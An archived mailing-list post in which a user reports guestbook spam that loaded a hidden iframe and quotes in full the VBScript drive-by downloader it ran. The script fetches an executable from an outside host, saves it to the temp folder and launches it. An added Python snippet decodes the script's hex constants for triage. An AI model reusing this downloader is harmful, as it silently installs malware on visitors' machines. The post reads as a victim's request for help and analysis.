Hey guys, I just got some spam posts on my guestbook which include an
iframe.  Inside the iframe a page is called which, after calling about
80 unescape JavaScript functions, tries to execute the following VB code.
I realized it when my antivirus started going nuts telling me about
executable files it was trying to run.

Do I need a patch for IE?  (IE 6.0 on Windows 2000 SP4) I didn't think a
web page could execute arbitrary files from a web server.

<script language="VBScript">

 On Error Resume Next

 Function h2s(s)

 Dim i

 For i = 1 To Len(s) Step 2

  h2s = h2s & Chr("&" & "H" & Mid(s, i, 2))

 Next

 End Function

 Const sClassID =
"636C7369643A42443936433535362D363541332D313144302D393833412D30304330344
6433239453336"

 Const sItem_1 = "41646F64622E53747265616D"

 Const sItem_2 = "536372697074696E672E46696C6553797374656D4F626A656374"

 Const sItem_3 = "4D6963726F736F66742E584D4C48545450"

 Const sItem_4 = "5368656C6C2E4170706C69636174696F6E"

 sFileURL = "http://money24online.com/file.exe";

 sFileName = "thw_expl.exe"

 Set DF = Document.createElement("object")

 Call DF.SetAttribute("classid", h2s(sClassID))

 Set AdoSream = DF.CreateObject(h2s(sItem_1), vbNullString)

 Set FS = DF.CreateObject(h2s(sItem_2), vbNullString)

 Set xml_http = DF.CreateObject(h2s(sItem_3), vbNullString)

 Call xml_http.Open("GET", sFileURL, False)

 Call xml_http.Send

 AdoSream.Type = 1

 Set tmp_path = FS.GetSpecialFolder(2)

 sFilePath = FS.BuildPath(tmp_path, sFileName)

 Call AdoSream.Open

 Call AdoSream.Write(xml_http.responseBody)

 Call AdoSream.SaveToFile(sFilePath, 2)

 Call AdoSream.Close

 Set Q = df.CreateObject(h2s(sItem_4), vbNullString)

 Call Q.ShellExecute(sFilePath, vbNullString, vbNullString, "open", 0)

 </script>

 

~Brad
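
For static triage of the script quoted above, this added example (not part of the original post) applies the same transform as its `h2s()` function to the hex constants, so the objects it asks for can be read without running it. The function names and the `CAPABILITY` annotations are this example's own; the constants are copied from the post, mail line wrap included.

```python
import re

# Const declarations copied from the post, including the mail client's
# line wrap in the middle of sClassID.
SAMPLE = '''
 Const sClassID =
"636C7369643A42443936433535362D363541332D313144302D393833412D30304330344
6433239453336"
 Const sItem_1 = "41646F64622E53747265616D"
 Const sItem_2 = "536372697074696E672E46696C6553797374656D4F626A656374"
 Const sItem_3 = "4D6963726F736F66742E584D4C48545450"
 Const sItem_4 = "5368656C6C2E4170706C69636174696F6E"
'''

# Analyst annotations (this example's own), based on how the quoted
# script uses each object after creating it.
CAPABILITY = {
    "adodb.stream": "writes binary data to disk",
    "scripting.filesystemobject": "resolves the temp folder path",
    "microsoft.xmlhttp": "fetches the remote file",
    "shell.application": "launches the saved file",
}

CONST_RE = re.compile(r'Const\s+(\w+)\s*=\s*"([0-9A-Fa-f\s]+)"')

def h2s(hex_text):
    """Same transform as the script's h2s(): two hex digits per character."""
    digits = re.sub(r"\s+", "", hex_text)  # undo e-mail line wrapping
    if len(digits) % 2:
        raise ValueError("odd number of hex digits")
    return bytes.fromhex(digits).decode("latin-1")

def decode_consts(script):
    """Return {constant name: decoded string} for every hex Const."""
    return {name: h2s(val) for name, val in CONST_RE.findall(script)}

def triage(script):
    """Return (name, decoded value, note) rows for an incident write-up."""
    rows = []
    for name, value in decode_consts(script).items():
        default = "COM class id" if value.lower().startswith("clsid:") else "unknown"
        rows.append((name, value, CAPABILITY.get(value.lower(), default)))
    return rows

if __name__ == "__main__":
    for row in triage(SAMPLE):
        print("%-10s %-45s %s" % row)
```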



Archive: 
http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:258312